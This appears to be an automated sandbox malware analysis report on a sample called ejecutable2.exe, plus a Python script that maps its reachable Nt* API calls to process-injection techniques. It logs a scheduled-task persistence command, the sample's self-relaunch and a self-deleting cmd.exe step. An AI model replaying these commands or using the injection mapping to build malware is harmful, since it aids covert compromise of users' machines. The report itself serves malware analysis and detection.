Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0242DBDA 6_2_0242DBDA
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0244CBA4 6_2_0244CBA4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239FBD7 6_2_0239FBD7
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023C286D 6_2_023C286D
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023AC85C 6_2_023AC85C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0243F8EE 6_2_0243F8EE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02425955 6_2_02425955
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023A29B2 6_2_023A29B2
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023B69FE 6_2_023B69FE
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0244098E 6_2_0244098E
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023D2E2F 6_2_023D2E2F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023BEE4C 6_2_023BEE4C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023B0F3F 6_2_023B0F3F
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023CDF7C 6_2_023CDF7C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023D0D3B 6_2_023D0D3B
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0239E2A8 appears 35 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 023E3F92 appears 88 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 023E373B appears 213 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0239DF5C appears 106 times
Source: C:\Windows\SysWOW64\wscript.exe Code function: String function: 0240F970 appears 75 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_004185D0 NtCreateFile, 4_2_004185D0
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00418680 NtReadFile, 4_2_00418680
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00418700 NtClose, 4_2_00418700
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_004187B0 NtAllocateVirtualMemory, 4_2_004187B0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023900C4 NtCreateFile,LdrInitializeThunk, 6_2_023900C4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023907AC NtCreateMutant,LdrInitializeThunk, 6_2_023907AC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FAB8 NtQueryValueKey,LdrInitializeThunk, 6_2_0238FAB8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FAE8 NtQueryInformationProcess,LdrInitializeThunk, 6_2_0238FAE8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 6_2_0238FAD0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FB68 NtFreeVirtualMemory,LdrInitializeThunk, 6_2_0238FB68
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FB50 NtCreateKey,LdrInitializeThunk, 6_2_0238FB50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FBB8 NtQueryInformationToken,LdrInitializeThunk, 6_2_0238FBB8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238F900 NtReadFile,LdrInitializeThunk, 6_2_0238F900
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238F9F0 NtClose,LdrInitializeThunk, 6_2_0238F9F0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_0238FED0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FFB4 NtCreateSection,LdrInitializeThunk, 6_2_0238FFB4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_0238FC60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FD8C NtDelayExecution,LdrInitializeThunk, 6_2_0238FD8C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FDC0 NtQuerySystemInformation,LdrInitializeThunk, 6_2_0238FDC0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390078 NtResumeThread, 6_2_02390078
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390060 NtQuerySection, 6_2_02390060
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390048 NtProtectVirtualMemory, 6_2_02390048
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023910D0 NtOpenProcessToken, 6_2_023910D0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0239010C NtOpenDirectoryObject, 6_2_0239010C
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02391148 NtOpenThread, 6_2_02391148
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_023901D4 NtSetValueKey, 6_2_023901D4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FA20 NtQueryInformationFile, 6_2_0238FA20
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FA50 NtEnumerateValueKey, 6_2_0238FA50
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FBE8 NtQueryVirtualMemory, 6_2_0238FBE8
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238F8CC NtWaitForSingleObject, 6_2_0238F8CC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238F938 NtWriteFile, 6_2_0238F938
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02391930 NtSetContextThread, 6_2_02391930
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FE24 NtWriteVirtualMemory, 6_2_0238FE24
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FEA0 NtReadVirtualMemory, 6_2_0238FEA0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FF34 NtQueueApcThread, 6_2_0238FF34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FFFC NtCreateProcessEx, 6_2_0238FFFC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC30 NtOpenProcess, 6_2_0238FC30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC48 NtSetInformationFile, 6_2_0238FC48
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390C40 NtGetContextThread, 6_2_02390C40
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC90 NtUnmapViewOfSection, 6_2_0238FC90
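The list above is a capability inventory (functions the code can reach), not a record of calls that were observed. As an added example that is not part of the Joe Sandbox report, the following Python groups these lines by process and checks which injection techniques the reachable Nt* set is sufficient for. The input is a subset of the report's own lines; the technique table is the example author's own minimal-API summary and is an assumption, not something the report states.

```python
"""Map the native functions a process can reach (as listed under "Contains
functionality to call native functions") onto the injection primitives they
add up to. Added example, not part of the Joe Sandbox report: the input lines
are copied from the report, the technique table is the example author's own
summary of which Nt* calls each technique minimally needs (an assumption)."""
import re

# Constructed input: a subset of the report's lines for PID 4 (the second
# ejecutable2.exe instance) and PID 6 (wscript.exe launched via explorer.exe).
REPORT_LINES = r"""
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_004185D0 NtCreateFile, 4_2_004185D0
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_00418680 NtReadFile, 4_2_00418680
Source: C:\Users\user\Desktop\ejecutable2.exe Code function: 4_2_004187B0 NtAllocateVirtualMemory, 4_2_004187B0
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FFB4 NtCreateSection,LdrInitializeThunk, 6_2_0238FFB4
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC60 NtMapViewOfSection,LdrInitializeThunk, 6_2_0238FC60
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02390078 NtResumeThread, 6_2_02390078
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02391148 NtOpenThread, 6_2_02391148
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_02391930 NtSetContextThread, 6_2_02391930
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FE24 NtWriteVirtualMemory, 6_2_0238FE24
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FF34 NtQueueApcThread, 6_2_0238FF34
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FFFC NtCreateProcessEx, 6_2_0238FFFC
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC30 NtOpenProcess, 6_2_0238FC30
Source: C:\Windows\SysWOW64\wscript.exe Code function: 6_2_0238FC90 NtUnmapViewOfSection, 6_2_0238FC90
""".strip().splitlines()

# "<pid>_<stage>_<addr> <symbol>[,<symbol>...], <pid>_" ; \2 ties the trailing
# reference back to the same PID so unrelated lines do not match.
LINE_RE = re.compile(
    r"^Source: (\S+) Code function: (\d+)_\d+_[0-9A-Fa-f]+ ([A-Za-z0-9_,]+) \2_")

# Each technique is a list of slots; a slot is satisfied by any one of its APIs.
TECHNIQUES = {
    "process hollowing": [
        {"NtCreateProcessEx", "NtOpenProcess"},         # a suspended or opened target
        {"NtUnmapViewOfSection"},                        # evict the target's own image
        {"NtWriteVirtualMemory", "NtMapViewOfSection"},  # place the payload in the target
        {"NtSetContextThread"},                          # point the main thread at it
        {"NtResumeThread"},                              # let it run
    ],
    "APC thread injection": [
        {"NtOpenProcess", "NtCreateProcessEx"},
        {"NtWriteVirtualMemory", "NtMapViewOfSection"},
        {"NtOpenThread"},                                # a thread handle to queue on
        {"NtQueueApcThread"},
    ],
    "section mapping injection": [
        {"NtOpenProcess", "NtCreateProcessEx"},
        {"NtCreateSection"},                             # section backing the payload
        {"NtMapViewOfSection"},                          # mapped into the remote process
    ],
}


def api_sets_by_process(lines):
    """Return {pid: (image_path, set of Nt* names)} from 'Code function' lines."""
    result = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        image, pid, symbols = m.group(1), int(m.group(2)), m.group(3)
        # LdrInitializeThunk and other non-Nt symbols on the same path are dropped.
        names = {s for s in symbols.split(",") if s.startswith("Nt")}
        _, known = result.setdefault(pid, (image, set()))
        known.update(names)
    return result


def match_techniques(apis):
    """For each technique, list the unmet slots; an empty list means every
    primitive the technique needs is reachable from this process."""
    return {
        name: [" or ".join(sorted(slot)) for slot in slots if not slot & apis]
        for name, slots in TECHNIQUES.items()
    }


def complete_techniques(lines):
    """{pid: sorted names of techniques whose whole primitive set is present}."""
    return {
        pid: sorted(t for t, missing in match_techniques(apis).items() if not missing)
        for pid, (_, apis) in api_sets_by_process(lines).items()
    }


if __name__ == "__main__":
    for pid, (image, apis) in sorted(api_sets_by_process(REPORT_LINES).items()):
        print(f"PID {pid} ({image}): {len(apis)} Nt* functions reachable")
        for tech, missing in match_techniques(apis).items():
            status = "COMPLETE" if not missing else "missing " + "; ".join(missing)
            print(f"  {tech:26s} {status}")
```

Run as a script it prints that PID 4 (the restarted sample, which only reaches file and allocation calls) completes none of the three sets, while PID 6 (the wscript.exe started under explorer.exe) completes all of them. A complete set is still only a capability; the behavioural signatures elsewhere in the report are what confirm that the calls were actually made.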
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\wscript.exe Process Stats: CPU usage > 98%
Sample file is different than original file name gathered from version info (the sample's own version resource names it UIntPtrTypeIn.exe; most of the remaining strings below come from one mapped memory region at 0x5DF0000 and are the OriginalFilename fields of system MUI resource files, not version info of the sample)
Source: ejecutable2.exe, 00000000.00000002.424354114.00000000011E4000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUIntPtrTypeIn.exe4 vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.423754997.00000000004B0000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameColladaLoader.dll4 vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.424055969.00000000005BF000.00000004.00000020.sdmp Binary or memory string: OriginalFilenamesctasks.exej% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.425701287.0000000004910000.00000004.00020000.sdmp Binary or memory string: OriginalFilenameCF_Secretaria.dll< vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.423882102.0000000000514000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCSRSS.Exe.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewinsrv.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWinInit.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWINLOGON.EXE.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameuser32j% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameservices.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamelsasrv.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesvchost.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewshtcpip.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewship6.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewshqos.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAUTHUI.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametzres.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesppsvc.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameInput.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTipTsf.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSpTip.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameTableTextService.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamegpsvc.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameaero.msstyles.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametaskcomp.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamespoolsv.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBFE.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFirewallAPI.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametaskhost.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUSERINIT.EXE.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: originalfilename vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameEXPLORER.EXE.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMSCMS.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamej% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMsCtfMonitor.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesnmptrap.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamelmhsvc.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedwm.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamedhcpcore.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamepeerdistsh.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameNetLogon.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesstpsvc.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamelocalspl.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenetmsg.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFXSRESM.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametaskeng.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWsdMon.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamevsstrace.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWLDAP32.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamenetprofm.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameThemeUI.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameExplorerFrame.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameesrb.dll.muiH vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamexpsrchvw.exe.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamestobject.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamerasdlg.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameAltTab.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamewscui.cpl.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameHCPROVIDERS.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameSearchIndexer.exe.mui@ vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamePNIDUI.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametquery.dll.mui@ vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameesent.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamesidebar.EXE.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMsMpRes.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenametwext.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamempr.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameschedsvc.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFDResPub.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFunDisc.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamerpcrt4.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameFDPrint.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameBASEBRD.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameimageres.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWINMM.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameDocumentPerformanceEvents.dll.muij% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameWerConCpl.DLL.MUIj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000000.00000002.426503203.0000000005DF0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameMSHTML.DLL.MUID vs ejecutable2.exe
Source: ejecutable2.exe, 00000004.00000002.487824120.0000000000AD0000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs ejecutable2.exe
Source: ejecutable2.exe, 00000004.00000002.486080402.0000000000560000.00000040.00020000.sdmp Binary or memory string: OriginalFilenamewscript.exe` vs ejecutable2.exe
Source: ejecutable2.exe, 00000004.00000000.422762878.00000000011E4000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameUIntPtrTypeIn.exe4 vs ejecutable2.exe
PE file contains strange resources
Source: ejecutable2.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: CmsVPZkxbOtm.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\ejecutable2.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: ejecutable2.exe Virustotal: Detection: 27%
Source: C:\Users\user\Desktop\ejecutable2.exe File read: C:\Users\user\Desktop\ejecutable2.exe Jump to behavior
Source: ejecutable2.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ejecutable2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ERROR: ... (UTF-16LE console output captured with interleaved null bytes; only the "ERROR:" prefix is recoverable, so the /Create call reported an error in this run) Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Console Write: ERRO... (second, more heavily garbled fragment of the same UTF-16LE error output) Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\ejecutable2.exe 'C:\Users\user\Desktop\ejecutable2.exe'
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp'
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Users\user\Desktop\ejecutable2.exe C:\Users\user\Desktop\ejecutable2.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ejecutable2.exe'
Source: C:\Users\user\Desktop\ejecutable2.exe Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\CmsVPZkxbOtm' /XML 'C:\Users\user\AppData\Local\Temp\tmp86AE.tmp' Jump to behavior
